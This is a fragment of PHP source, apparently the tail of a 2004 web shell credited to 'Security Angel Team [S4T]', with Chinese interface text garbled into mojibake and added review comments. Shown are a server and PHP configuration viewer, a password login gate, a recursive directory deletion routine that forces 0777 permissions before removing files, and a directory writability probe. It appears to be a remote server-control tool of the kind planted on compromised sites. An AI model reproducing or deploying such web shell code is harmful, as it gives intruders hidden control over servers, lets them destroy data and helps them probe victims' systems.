?> <table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff"> <form action="?action=phpenv" method="POST"> <tr class="firstalt"> <td style="padding-left: 5px;"><b>²é¿´PHPÅäÖòÎÊý×´¿ö</b></td> </tr> <tr class="secondalt"> <td style="padding-left: 5px;">ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="²é¿´" class="input"><input name="action" type="hidden" value="viewphpvar"></td> </tr> </form> <?php
    // Three passes, one per group heading; the rows themselves are printed by the code that follows.
    for($a=0;$a<3;$a++){
        if($a == 0){
            $hp = array("server","·þÎñÆ÷ÌØÐÔ");
        }elseif($a == 1){
            $hp = array("php","PHP»ù±¾ÌØÐÔ");
        }elseif($a == 2){
            $hp = array("basic","×é¼þÖ§³Ö×´¿ö");
        }
?> <tr class="firstalt"> <td style="padding-left: 5px;"><b><?=$hp[1]?></b></td> </tr> <tr class="secondalt"> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <? 
// NOTE(review): continues the phpenv rendering loop opened just above; $a selects which
// index range of $info is printed (0-12, 13-24, 25-40).
        if($a == 0){
            for($i=0;$i<=12;$i++){
                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
            }
        }elseif($a == 1){
            for($i=13;$i<=24;$i++){
                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
            }
        }elseif($a == 2){
            for($i=25;$i<=40;$i++){
                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
            }
        }
?> </table> </td> </tr> <?
    }//for
    echo "</table>";
}//end phpenv
// Page footer: copyright line plus the timing string from debuginfo(), then the output buffer is flushed.
?> <hr width="760" noshade> <table width="760" border="0" cellpadding="0"> <tr> <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td> <td align="right"><?php debuginfo(); ob_end_flush(); ?></td> </tr> </table> </center> </body> </html> <?php

/*======================================================
Function library
======================================================*/

// Login entry point: prints the password form and terminates the request.
// The form posts two fields, adminpass and action=login, back to the same URL.
// Because of the exit, a caller that invokes loginpage() never continues.
function loginpage() {
?> <style type="text/css"> input { font-family: "Verdana"; font-size: "11px"; BACKGROUND-COLOR: "#FFFFFF"; height: "18px"; border: "1px solid #666666"; } </style> <form method="POST" action=""> <span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login"> <input type="submit" value="OK"> </form> <?php
    exit;
}//end loginpage()

// Page debug information: prints the elapsed time since the global $starttime, six decimals.
function debuginfo() {
    global $starttime;
    $mtime = explode(' ', microtime());
    $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
    echo "Processed in $totaltime second(s)";
}

// Strip escape characters: applies stripslashes() to string values, recursing into nested arrays.
// Keys 'argc' and 'argv' are skipped, as are keys that are entirely upper-case unless
// they are integer-like. The array is modified in place (by reference) and also returned.
// NOTE(review): each() was removed in PHP 8.0.
function stripslashes_array(&$array) {
    while(list($key,$var) = each($array)) {
        if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
            if (is_string($var)) {
                $array[$key] = stripslashes($var);
            }
            if (is_array($var)) {
                $array[$key] = stripslashes_array($var);
            }
        }
    }
    return $array;
}

// Delete directory: recursive removal of $deldir.
// Every entry is chmod-ed to 0777 before it is removed, sub-directories are handled by
// recursion, and each level echoes its own success/failure message. Errors from chmod,
// unlink and rmdir are silenced with @.
function deltree($deldir) {
    $mydir=@dir($deldir);
    while($file=$mydir->read()) {
        if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
            @chmod("$deldir/$file",0777);
            deltree("$deldir/$file");
        }
        if (is_file("$deldir/$file")) {
            @chmod("$deldir/$file",0777);
            @unlink("$deldir/$file");
        }
    }
    $mydir->close();
    @chmod("$deldir",0777);
    echo @rmdir($deldir) ? "<b>Ŀ¼ɾ³ý³É¹¦!</b>" : "<font color=\"#ff0000\">Ŀ¼ɾ³ýʧ°Ü!</font>";
}

// Determine read/write status of $dir: returns 1 if a file can be created in it, 0 if not.
// NOTE(review): this probe has side effects. A missing directory is created with mode 0777,
// and the probe file is always "$dir/test.txt", opened in 'w' mode and then unlinked, so
// an existing test.txt in the probed directory is truncated and deleted.
// $writeable is never assigned when $dir is still not a directory after the mkdir attempt.
function dir_writeable($dir) {
    if (!is_dir($dir)) {
        @mkdir($dir, 0777);
    }
    if(is_dir($dir)) {
        if ($fp = @fopen("$dir/test.txt", 'w')) {
            @fclose($fp);
            @unlink("$dir/test.txt");
            $writeable = 1;
        } else {
            $writeable = 0;
        }
    }
    return $writeable;
}

// Alternate the background class of table rows: "firstalt" and "secondalt" in turn,
// driven by the global counter $bgcounter.
function getrowbg() {
    global $bgcounter;
    if ($bgcounter++%2==0) {
        return "firstalt";
    } else {
        return "secondalt";
    }
}

// Get the current filesystem path: resolves $relativepath against $mainpath segment by segment.
// '.' and empty segments are skipped and '..' drops the last segment collected so far.
// Because empty segments are skipped, an input starting with '/' is appended to
// $mainpath rather than treated as absolute. The global $dir is declared but not used.
function getPath($mainpath, $relativepath) {
    global $dir;
    $mainpath_info = explode('/', $mainpath);
    $relativepath_info = explode('/', $relativepath);
    $relativepath_info_count = count($relativepath_info);
    for ($i=0; $i<$relativepath_info_count; $i++) {
        if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue;
        if ($relativepath_info[$i] == '..') {
            $mainpath_info_count = count($mainpath_info);
            unset($mainpath_info[$mainpath_info_count-1]);
            continue;
        }
        $mainpath_info[count($mainpath_info)] = $relativepath_info[$i];
    } //end for
    return implode('/', $mainpath_info);
}

// Check a PHP configuration parameter: maps get_cfg_var($varname) to No / Yes, or returns the raw value.
// NOTE(review): No and Yes are bare, undefined constants; older PHP versions evaluate
// them to the strings 'No' and 'Yes', PHP 8 raises an Error instead. switch compares
// loosely, so a FALSE result (unknown directive) takes the `case 0` branch.
function getphpcfg($varname) {
    switch($result = get_cfg_var($varname)) {
        case 0:
            return No;
            break;
        case 1:
            return Yes;
            break;
        default:
            return $result;
            break;
    }
}

// Check function availability: Yes when function_exists($funName) is true, otherwise No
// (the same bare constants as in getphpcfg()).
function getfun($funName) {
    return (false !== function_exists($funName)) ? Yes : No;
}
?>